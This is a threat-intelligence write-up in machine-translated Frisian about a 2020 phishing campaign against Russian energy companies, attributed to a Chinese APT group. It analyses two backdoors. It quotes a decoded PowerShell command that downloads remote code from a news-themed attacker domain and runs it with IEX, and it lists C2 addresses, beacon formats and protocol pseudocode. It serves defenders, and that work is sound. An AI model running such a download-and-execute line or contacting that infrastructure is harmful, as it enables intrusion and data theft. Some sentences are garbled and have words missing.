Us ûnderfining by it ûndersykjen fan ynsidinten fan kompjûterfeiligens lit sjen dat e-post noch altyd ien fan 'e meast foarkommende kanalen is dy't brûkt wurde troch oanfallers om yn earste ynstânsje oanfallen netwurkynfrastruktueren te penetrearjen. Ien achteleaze aksje mei in fertochte (of net sa fertochte) brief wurdt in yngongspunt foar fierdere ynfeksje, en dêrom brûke cyberkriminelen aktyf sosjale engineeringmetoaden, hoewol mei wikseljend súkses.
Yn dizze post wolle wy prate oer ús resinte ûndersyk nei in spamkampanje dy't rjochte is op in oantal bedriuwen yn it Russyske brânstof- en enerzjykompleks. Alle oanfallen folgen itselde senario mei help fan falske e-mails, en gjinien like in protte muoite te setten yn 'e tekstynhâld fan dizze e-mails.
Ynljochtingstsjinst
It begon allegear oan 'e ein fan april 2020, doe't Doctor Web-firusanalisten in spamkampanje ûntdutsen wêryn hackers in bywurke tillefoanmap stjoerde nei meiwurkers fan in oantal bedriuwen yn it Russyske brânstof- en enerzjykompleks. Fansels wie dit net in ienfâldige show fan soarch, om't de map net echt wie, en de .docx-dokuminten hawwe twa ôfbyldings downloade fan boarnen op ôfstân.
Ien fan harren is ynladen nei de kompjûter fan de brûker fan de nijs[.]zannews[.]com-tsjinner. It is opmerklik dat de domeinnamme fergelykber is mei it domein fan it anty-korrupsje mediasintrum fan Kazachstan - zannews[.]kz. Oan 'e oare kant die it brûkte domein fuortendaliks tinken oan in oare 2015-kampanje bekend as TOPNEWS, dy't in ICEFOG-efterdoar brûkte en Trojaanske kontrôledomeinen hie mei de substring "nijs" yn har nammen. In oare nijsgjirrige eigenskip wie dat by it ferstjoeren fan e-mails nei ferskate ûntfangers, fersiken om in ôfbylding te downloaden brûkten of ferskate fersykparameters as unike ôfbyldingsnammen.
Wy leauwe dat dit dien is mei it doel fan it sammeljen fan ynformaasje om in "betroubere" adressearre te identifisearjen, dy't dan garandearre wurde soe om de brief op it krekte momint te iepenjen. It SMB-protokol waard brûkt om de ôfbylding fan 'e twadde server te downloaden, wat dien wurde koe om NetNTLM-hashes te sammeljen fan' e kompjûters fan meiwurkers dy't it ûntfongen dokumint iepene hawwe.
En hjir is de brief sels mei de falske map:
Yn juny fan dit jier begûnen hackers in nije domeinnamme te brûken, sports[.]manhajnews[.]com, om ôfbyldings te uploaden. De analyze liet sjen dat manhajnews[.]com-subdomeinen sûnt op syn minst septimber 2019 binne brûkt yn spammailings. Ien fan 'e doelen fan dizze kampanje wie in grutte Russyske universiteit.
Ek yn juny kamen de organisatoaren fan 'e oanfal mei in nije tekst foar har brieven: dizze kear befette it dokumint ynformaasje oer yndustryûntwikkeling. De tekst fan 'e brief dúdlik oanjûn dat syn skriuwer wie of net in memmetaal sprekker fan it Russysk, of wie bewust meitsje sa'n yndruk oer himsels. Spitigernôch, de ideeën fan yndustry ûntwikkeling, lykas altyd, bliken te wêzen gewoan in omslach - it dokumint wer ynladen twa ôfbyldings, wylst de tsjinner waard feroare yn download[.]inklingpaper[.]com.
De folgjende ynnovaasje folge yn july. Yn in besykjen om de detectie fan kweade dokuminten troch antivirusprogramma's te omgean, begon oanfallers Microsoft Word-dokuminten te brûken fersifere mei in wachtwurd. Tagelyk besleaten de oanfallers in klassike sosjale technyk te brûken - beleanningsnotifikaasje.
De tekst fan it berop waard wer yn deselde styl skreaun, wat ekstra erchtinken wekte by de adressearre. De tsjinner foar it downloaden fan de ôfbylding is ek net feroare.
Tink derom dat yn alle gefallen, elektroanyske postfakken registrearre op de mail[.]ru en yandex[.]ru domeinen waarden brûkt om brieven te ferstjoeren.
Oanfal
Begjin septimber 2020 wie it tiid foar aksje. Us firusanalisten hawwe in nije weach fan oanfallen opnommen, wêryn oanfallers wer brieven stjoerde ûnder it foarwendsel fan it bywurkjen fan in telefoannûmer. Dizze kear befette de taheaksel lykwols in kweade makro.
By it iepenjen fan it taheakke dokumint makke de makro twa bestannen:
- VBS-skript %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, dat bedoeld wie om in batchbestân te starten;
- It batchbestân sels %APPDATA%configstest.bat, dy't obfuscated wie.
De essinsje fan har wurk komt del op it lansearjen fan de Powershell-shell mei bepaalde parameters. De parameters dy't trochjûn binne oan 'e shell wurde dekodearre yn kommando's:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;As folget út de presintearre kommando's, wurdt it domein wêrfan de loadload wurdt ynladen wer ferklaaid as in nijsside. In ienfâldige , waans ienige taak is om shellcode te ûntfangen fan 'e kommando- en kontrôletsjinner en it út te fieren. Wy koene twa soarten efterdoarren identifisearje dy't kinne wurde ynstalleare op 'e PC fan it slachtoffer.
BackDoor.Siggen2.3238
De earste is BackDoor.Siggen2.3238 - ús spesjalisten hienen net earder tsjinkaam, en d'r wiene ek gjin fermeldingen fan dit programma troch oare antyvirusferkeapers.
Dit programma is in efterdoar skreaun yn C ++ en rint op 32-bit Windows bestjoeringssystemen.
BackDoor.Siggen2.3238 is by steat om te kommunisearjen mei de behear tsjinner mei help fan twa protokollen: HTTP en HTTPS. De testte stekproef brûkt it HTTPS-protokol. De folgjende User-Agent wurdt brûkt yn fersiken nei de tsjinner:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Yn dit gefal wurde alle oanfragen levere mei de folgjende set parameters:
%s;type=%s;length=%s;realdata=%send
wêr't elke rigel %s oerienkommende wurdt ferfongen troch:
- ID fan 'e ynfekteare kompjûter,
- type fersyk dat ferstjoerd wurdt,
- lingte fan gegevens yn it realdatafjild,
- data.
Op it poadium fan it sammeljen fan ynformaasje oer it ynfekteare systeem genereart de efterdoar in line lykas:
lan=%s;cmpname=%s;username=%s;version=%s;
wêr lan is it IP-adres fan de ynfektearre kompjûter, cmpname is de kompjûter namme, brûkersnamme is de brûkersnamme, ferzje is de line 0.0.4.03.
Dizze ynformaasje mei de sysinfo identifier wurdt ferstjoerd fia in POST fersyk nei de kontrôle tsjinner leit op https[:]//31.214[.]157.14/log.txt. As yn antwurd BackDoor.Siggen2.3238 ûntfangt it HEART-sinjaal, de ferbining wurdt beskôge as suksesfol, en de efterdoar begjint de haadsyklus fan kommunikaasje mei de tsjinner.
Mear folsleine beskriuwing fan operaasjeprinsipes BackDoor.Siggen2.3238 is yn ús .
BackDoor.Whitebird.23
It twadde programma is in oanpassing fan de BackDoor.Whitebird efterdoar, ús al bekend fan it ynsidint mei in oerheidsynstânsje yn Kazachstan. Dizze ferzje is skreaun yn C ++ en is ûntworpen om te rinnen op sawol 32-bit as 64-bit Windows bestjoeringssystemen.
Lykas de measte programma's fan dit type, BackDoor.Whitebird.23 ûntworpen om in fersifere ferbining te meitsjen mei de kontrôletsjinner en unautorisearre kontrôle fan in ynfekteare kompjûter. Ynstallearre yn in kompromittearre systeem mei in dropper .
It stekproef dat wy ûndersochten wie in kweade bibleteek mei twa eksporten:
- Google Play
- Toets.
Oan it begjin fan har wurk ûntsiferet it de konfiguraasje dy't hardwired is yn it efterdoarlichem mei in algoritme basearre op 'e XOR-operaasje mei byte 0x99. De konfiguraasje sjocht der sa út:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Om syn konstante wurking te garandearjen, feroaret de efterdoar de wearde oantsjutte yn it fjild wurkoeren konfiguraasjes. It fjild befettet 1440 bytes, dy't de wearden 0 of 1 nimme en elke minuut fan elke oere yn 'e dei fertsjintwurdigje. Makket in aparte tried foar elke netwurkynterface dy't harket nei de ynterface en siket nei autorisaasjepakketten op 'e proxytsjinner fan' e ynfekteare kompjûter. As sa'n pakket wurdt ûntdutsen, foeget de efterdoar ynformaasje oer de proxy-tsjinner ta oan syn list. Dêrneist kontrolearret foar de oanwêzigens fan in proxy fia WinAPI InternetQueryOptionW.
It programma kontrolearret de aktuele minút en oere en fergeliket it mei de gegevens yn it fjild wurkoeren konfiguraasjes. As de wearde foar de oerienkommende minút fan 'e dei net nul is, dan wurdt in ferbining makke mei de kontrôletsjinner.
It oprjochtsjen fan in ferbining mei de tsjinner simulearret it meitsjen fan in ferbining mei it TLS ferzje 1.0 protokol tusken de kliïnt en de tsjinner. It lichem fan 'e efterdoar befettet twa buffers.
De earste buffer befettet it TLS 1.0 Client Hello-pakket.
De twadde buffer befettet TLS 1.0 Client Key Exchange pakketten mei in kaai lingte fan 0x100 bytes, Change Cipher Spec, Encrypted Handshake Message.
By it ferstjoeren fan in Client Hello-pakket skriuwt de efterdoar 4 bytes fan 'e hjoeddeistige tiid en 28 bytes fan pseudo-willekeurige gegevens yn it Client Random-fjild, berekkene as folget:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
It ûntfongen pakket wurdt stjoerd nei de kontrôle tsjinner. It antwurd (Server Hello-pakket) kontrolearret:
- neilibjen fan TLS protokol ferzje 1.0;
- korrespondinsje fan it tiidstempel (de earste 4 bytes fan it Random Data-pakketfjild) oantsjutte troch de kliïnt nei it tiidstempel oantsjutte troch de tsjinner;
- oerienkomst fan 'e earste 4 bytes nei it tiidstempel yn it fjild Random Data fan 'e kliïnt en tsjinner.
Yn gefal fan de oantsjutte wedstriden, taret de efterdoar in Client Key Exchange-pakket. Om dit te dwaan, feroaret it de Iepenbiere kaai yn it Client Key Exchange-pakket, lykas de fersifering IV en fersiferingsgegevens yn it pakket fersifere handshake-berjocht.
De efterdoar ûntfangt dan it pakket fan 'e kommando- en kontrôletsjinner, kontrolearret dat de TLS-protokolferzje 1.0 is, en akseptearret dan noch 54 bytes (it lichem fan it pakket). Dit foltôget de ferbining opset.
Mear folsleine beskriuwing fan operaasjeprinsipes BackDoor.Whitebird.23 is yn ús .
Konklúzje en konklúzjes
Analyse fan dokuminten, malware, en de brûkte ynfrastruktuer lit ús mei fertrouwen sizze dat de oanfal waard taret troch ien fan 'e Sineeske APT-groepen. Sjoen de funksjonaliteit fan efterdoarren dy't ynstalleare op 'e kompjûters fan' e slachtoffers yn it gefal fan in suksesfolle oanfal, liedt ynfeksje op syn minst ta de stellerij fan fertroulike ynformaasje fan 'e kompjûters fan oanfallen organisaasjes.
Dêrnjonken is in heul wierskynlik senario de ynstallaasje fan spesjale Trojans op lokale servers mei in spesjale funksje. Dit kinne domeincontrollers, e-postservers, ynternetgateways, ensfh. Sa't wy yn it foarbyld sjen koenen , Sokke tsjinners binne fan bysûnder belang foar oanfallers om ferskate redenen.
Boarne: www.habr.com